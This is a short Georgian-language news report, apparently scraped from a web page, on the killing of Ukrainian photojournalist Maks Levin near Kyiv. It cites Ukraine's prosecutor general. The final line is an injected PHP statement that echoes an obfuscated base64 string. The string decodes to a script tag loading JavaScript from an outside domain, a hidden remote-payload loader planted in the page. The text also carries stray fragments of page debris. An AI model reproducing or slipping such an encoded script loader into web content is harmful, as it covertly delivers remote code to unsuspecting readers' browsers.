celsiusi
ავერსი საქკაბელი
ცნობილი უკრაინელი ფოტოჟურნალისტი და დოკუმენტალისტი მაკს ლევინი ოკუპანტებმა ცეცხლსასროლი იარაღიდან ორჯერ გასროლით მოკლეს. ამის შესახებ ინფორმაციას უკრაინის გენერალური პროკურატურა ავრცელებს.
 
ფოტოჟურნალისტის ცხედარი ვიშგოროდის რაიონის სოფელ გუტა მეჟიგორსკაიაში იპოვეს.
 
წინასწარი ინფორმაციით, რუსეთის ფედერაციის შეიარაღებული ძალების სამხედროებმა უიარაღო მაქსიმ ლევინი ცეცხლსასროლი იარაღიდან ორი გასროლით მოკლეს", - განაცხადა პროკურატურამ.
 
მათივე ინფორმაციით, მიღებულია ყველა ზომა დანაშაულის ყველა გარემოების დასადგენად.
 
ცნობისთვის, უკრაინელი ფოტოჟურნალისტი დაკარგულად ითვლებოდა. ლევინის მეგობარმა მარკიან ლისეიკომ Ukrinform-ის ჟურნალისტებს განუცხადა, რომ ლევინი ფრონტზე იმყოფებოდა კიევის მახლობლად, მაგრამ 13 მარტის შემდეგ მასთან დაკავშირება ვერ ხერხდებოდა.
759
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");